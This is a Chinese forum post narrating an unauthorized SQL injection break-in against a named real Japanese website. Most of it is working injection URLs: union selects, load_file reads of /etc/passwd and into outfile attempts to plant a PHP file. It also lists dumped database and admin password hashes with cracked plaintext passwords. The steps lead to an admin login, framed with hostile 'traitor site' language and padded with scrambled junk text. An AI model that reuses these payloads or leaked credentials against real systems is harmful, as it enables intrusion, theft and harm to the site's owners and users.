原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

0x01. 检测 www.zuaa.jp 收集数据

4 @; a# X7 V, a, f  ~
* t3 i: l) I: l! n. W  a! \whatweb

9 [, L6 I6 A3 B% e! K- w
+ A, D$ N+ e* d# g; Z3 y利用NMAP扫描

( E  J# X5 p7 S$ a* b& k中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
" s* Q8 |0 m/ m# t7 o0x02.找注入点
/ b$ k' g; M$ o0 X/ ~! [找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
# i! f; b8 d' m  C& F! y% O

0x03.order by
% z9 [2 n' ~( t' D+ ^( Y! l             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

order by 28报错，order by 27正常

7 ~$ Q# z" v" L" X1 }6 N% S0x04.   union手动查询
+ E! ^3 b& x8 T' w) z$ whttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
, X  D# C7 n  s添加到 27 时正常显示
  p: g) N- g/ O# m
  G5 B8 L- \' A8 E) l9 Z1 j中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
, F0 h- w! v% l% |3 }
0x05. info:
) X$ z0 Z4 `+ y9 E" a( {http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

0 M* B  X8 l+ L: R; W  ~user:            root@localhost
% o5 E# X9 ^6 v& T- fdatabase:    openpne
; a' x3 }, D# o0 `- T4 I4 D4 Dversion:      4.1.22
os:             portbld-freebsd5.4
$ h' K4 g0 a# R* C$ z+ C
  s) F" B. S/ C! p- M4 K0x06. root用户
, x, W4 p( Y( W* b" x# j% j: W利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
6 p; W; l4 r" G* r' H; \
! k1 Q/ ?9 e& a7 B% x5 E通过工具转换
, }1 O/ c3 W3 ?) K
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

3 y( }8 k: r- L' O0x07. 利用 into outfile
全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
9 V/ T3 j5 q) E$ i* f
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”

! \8 z" ~  u( n0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
8 V4 F9 d* O; V6 d
/ w6 K' u9 G! \% x, A
* ]* z% T/ r; v( h
7 A: B4 x- r8 T. X2 m0x09. 查找后台
利用 现有的各种 后台工具尝试都不行

0x10.  MySL外联方法
; V5 ]! N3 i4 a从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
7 [* p7 C" d7 p8 p) N$ \; Y* ]http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
  M9 n: L8 L0 n' Z! j3 L
- N8 J1 H& z$ o7 \; u, |% ^- i这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
  F( A- p* q( A8 F; [# T1 s1 jopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知


0x11. 网站突破
' R7 l" F$ z( x! }发现网站的源程序 openpne, google 下载 openpne 源码
. \/ {( L6 Z) u2 N: h3 p
* H4 b* L7 d- W2 E
' S; @6 w9 B8 j: {0x12. 默认信息利用
) Q- t: k6 n# _3 n, d/ l! N$ Ehttp://sns.zuaa.jp/?m=admin&a=page_login

表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

7 e8 A: @( u$ e解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
4 N# ]% [, e# n' K- ^. [zuaajp:c0923ec5857796a393da99905008c176,          zju1897

& ~8 f/ f! Y- Y6 f" d2 `, x/ T中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x13. 登录后台


5 a7 o: W2 n% {1 Q$ K
0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
1 B" X' E, A- J9 e( @8 @0 y, E
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
* H3 ^: M' b0 t6 z7 l8 j

荒村狂客

哪个牛人 费的这劲 入侵的